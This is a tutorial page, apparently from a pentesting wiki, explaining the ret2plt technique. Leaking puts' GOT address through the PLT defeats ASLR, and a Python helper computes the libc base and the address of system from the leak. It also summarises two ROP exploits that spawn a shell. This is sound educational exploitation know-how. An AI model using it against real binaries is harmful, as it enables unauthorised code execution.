Ret2plt
The goal of this technique is to leak the address of a function through the PLT so that ASLR can be bypassed. If, for example, you leak the address of the puts function from libc, you can then compute where the libc base is and add known offsets to reach other functions such as system.
This can be done with a pwntools payload like the following (from here):
Note how puts (using the address from the PLT) is called with the address of the puts entry located in the GOT (Global Offset Table). This works because by the time puts prints the GOT entry of puts, that entry already contains the exact address of puts in memory.
Also note how the address of main is used in the exploit, so that when puts finishes, the binary calls main again instead of exiting (and the leaked address continues to be valid).
Note that for this to work the binary cannot be compiled with PIE, or you must already have a leak that bypasses PIE, so that the addresses of the PLT, the GOT and main are known. Otherwise, you need to bypass PIE first.
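To make the computation described above concrete, here is an added example (not code from the original page) that turns the bytes puts prints for the GOT entry into a 64-bit address, checks that the recovered libc base is plausible, and derives system from it. The libc offsets are constructed placeholders; on a real binary they come from the target's own libc (for example via readelf -s or pwntools' ELF()).

```python
import struct

# Constructed placeholder offsets, NOT taken from any real libc build.
# Real values depend on the exact libc the target loads.
LIBC_OFFSETS = {"puts": 0x80E50, "system": 0x50D70}


def parse_leak(raw: bytes) -> int:
    """Convert the bytes puts printed for the GOT entry into a 64-bit address.

    puts stops at the first NUL byte, so a canonical user-space x86-64
    pointer (two leading zero bytes) arrives as only 6 bytes followed by
    the newline puts appends; pad it back to 8 bytes before unpacking.
    """
    raw = raw.rstrip(b"\n")
    if not 1 <= len(raw) <= 8:
        raise ValueError(f"unexpected leak length {len(raw)}")
    return struct.unpack("<Q", raw.ljust(8, b"\x00"))[0]


def resolve_libc(leaked_puts: int, offsets=LIBC_OFFSETS) -> dict:
    """Recover the libc base from the leaked puts address and derive symbols.

    libc is mmap'ed at a page-aligned address, so a base that is not a
    multiple of 0x1000 means the leak was mis-parsed or the offsets belong
    to a different libc build; refuse rather than continue with bad values.
    """
    base = leaked_puts - offsets["puts"]
    if base & 0xFFF:
        raise ValueError(f"libc base {base:#x} is not page aligned; wrong offsets?")
    resolved = {name: base + off for name, off in offsets.items()}
    resolved["base"] = base
    return resolved


if __name__ == "__main__":
    # Constructed sample: what puts would print for a GOT entry of 0x7f12345e7e50.
    sample_output = b"\x50\x7e\x5e\x34\x12\x7f\n"
    puts_addr = parse_leak(sample_output)
    for name, addr in resolve_libc(puts_addr).items():
        print(f"{name:>6}: {addr:#x}")
```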
You can find a full example of this bypass here. This was the final exploit from that example:
64 bit, ASLR enabled but no PIE. The first step is to fill the overflow up to the 0x00 byte of the canary and then call puts to leak it. With the canary known, a ROP chain is built that calls puts to leak the address of puts from the GOT, and a second ROP chain calls system('/bin/sh').
64 bit, ASLR enabled, no canary, stack overflow in main from a child function. A ROP chain calls puts to leak the address of puts from the GOT and then calls a one gadget.